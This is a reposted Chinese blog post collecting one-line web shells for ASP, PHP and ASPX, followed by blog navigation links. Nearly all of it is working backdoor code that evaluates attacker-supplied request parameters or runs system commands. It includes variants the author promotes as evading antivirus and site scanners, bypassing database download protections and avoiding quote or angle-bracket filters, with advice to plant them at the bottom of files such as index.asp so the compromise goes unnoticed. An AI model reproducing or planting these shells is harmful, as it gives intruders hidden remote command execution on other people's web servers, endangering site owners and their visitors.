一句话
以下這個ASP一句話
<%If Request("1")<>"" Then ExecuteGlobal(Request("1"))%>
<?php ($_=@$_GET[2]).@$_($_POST[1])?>
上面這句是防殺防掃的!網(wǎng)上很少人用!可以插在網(wǎng)頁任何ASP文件的最底部不會出錯,比如index.asp里面也是可以的!因為加了判斷!
加了判斷的PHP一句話,與上面的ASP一句話相同道理,也是可以插在任何PHP文件的最底部不會出錯!
<?if(isset($_POST['1'])){eval($_POST['1']);}?>
<?php system($_REQUEST[1]);?>
無防下載表,有防下載表可嘗試插入以下語句突破的一句話
<%execute request("class")%><%'<% loop <%:%>
<%'<% loop <%:%><%execute request("class")%>
<%execute request("class")'<% loop <%:%>
備份專用
<%eval(request("1")):response.end%>
asp一句話
<%execute(request("1"))%>
php一句話
<?php eval($_POST[1]);?>
aspx一句話
<script runat="server">
WebAdmin2Y.x.y aaaaa = new WebAdmin2Y.x.y("add6bb58e139be10");
</script>
可以躲過雷客圖的一句話。
<%
set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
ms.Language="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.ExecuteStatement("ev"&"al(request(""1""))")
%>
不用'<,>'的asp一句話
<script runat=server>execute request("1")</script>
不用雙引號的一句話。
<%eval request(chr(35))%>
轉(zhuǎn)載于:https://www.cnblogs.com/amwld/archive/2011/11/20/2255744.html
創(chuàng)作挑戰(zhàn)賽新人創(chuàng)作獎勵來咯,堅持創(chuàng)作打卡瓜分現(xiàn)金大獎總結(jié)
- 上一篇: java 统计单词个数和标点符号
- 下一篇: idea new对象后自动补全_IDEA